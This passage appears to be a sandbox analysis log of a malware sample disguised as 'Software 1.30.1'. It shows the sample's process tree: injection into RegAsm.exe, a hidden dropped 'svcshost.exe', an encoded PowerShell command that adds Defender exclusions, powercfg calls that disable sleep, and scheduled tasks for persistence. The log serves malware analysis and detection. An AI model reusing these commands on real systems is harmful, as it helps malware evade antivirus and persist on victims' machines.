PID:5908
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe" --start-maximized5⤵
- Executes dropped EXE
PID:5448 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --start-maximized --ran-launcher6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:508 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1b8,0x1bc,0x1c0,0x1b4,0x1c4,0x7ff9741261d0,0x7ff9741261e0,0x7ff9741261f07⤵
- Executes dropped EXE
PID:6124
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"3⤵
- Executes dropped EXE
PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271\assistant\assistant_installer.exe" --version3⤵
- Executes dropped EXE
PID:6084 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202405221940271\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x1554f48,0x1554f58,0x1554f644⤵
- Executes dropped EXE
PID:6044
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1856,i,773477202886695382,2034138728384650120,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:6104
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4648
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5648
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Software 1.30.1.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3988
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Software 1.30.1\" -spe -an -ai#7zMap10684:92:7zEvent291971⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:5324
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Software 1.30.1\" -spe -an -ai#7zMap32514:92:7zEvent320911⤵PID:2004
-
C:\Users\Admin\Downloads\Software 1.30.1\Software 1.30.1.exe"C:\Users\Admin\Downloads\Software 1.30.1\Software 1.30.1.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5740 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:5808
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:5784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:5852
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:5856 -
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"3⤵PID:5184
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵PID:5244
-
C:\Windows\system32\mode.commode 65,105⤵PID:7796
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p563741341569714296105326100 -oextracted5⤵PID:7736
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵PID:7684
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵PID:4436
-
-
C:\Windows\system32\attrib.exeattrib +H "svcshost.exe"5⤵
- Views/modifies file attributes
PID:7492
-
-
C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe"svcshost.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5476 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAHAARABsACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAOQBaADEAagBCAE0AOAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBWAE0ARwBoAGUAeQBhAGIANQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAE0AdABDAEUAeQAzAFkAOQAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off6⤵PID:7968
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHAARABsACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAOQBaADEAagBCAE0AOAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBWAE0ARwBoAGUAeQBhAGIANQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAE0AdABDAEUAeQAzAFkAOQAjAD4A"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7896
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵PID:3604
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵PID:5440
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-ac 07⤵PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:7924
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:4416
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3345" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵PID:7208
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3345" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
PID:2592
-
-
-
-
-
-
-
C:\Users\Admin\Downloads\Software 1.30.1\Software 1.30.1.exe"C:\Users\Admin\Downloads\Software 1.30.1\Software 1.30.1.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5760 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5128
-
-
C:\Users\Admin\Downloads\Software 1.30.1\Software 1.30.1.exe"C:\Users\Admin\Downloads\Software 1.30.1\Software 1.30.1.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:372 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:1840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:2328
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1012
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --start-maximized --ran-launcher --lowered-browser1⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1324 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1b8,0x1bc,0x1c0,0xf4,0x1c4,0x7ff9741261d0,0x7ff9741261e0,0x7ff9741261f02⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2164 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --enable-quic --flag-switches-begin --flag-switches-end --lowered-browser --ran-launcher --start-maximized --crash-count=13⤵PID:7908
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1b8,0x1bc,0x1c0,0x1b4,0x1c4,0x7ff9741261d0,0x7ff9741261e0,0x7ff9741261f04⤵PID:8100
-
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1784,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5036
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=1564,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=1936 /prefetch:32⤵
- Executes dropped EXE
- Loads dropped DLL
PID:856
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2100,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4764
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2660,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2348
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2664,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:524
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2688,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4628
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2692,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=2944 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4412
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2700,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=3060 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:604
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3512,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2548
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on 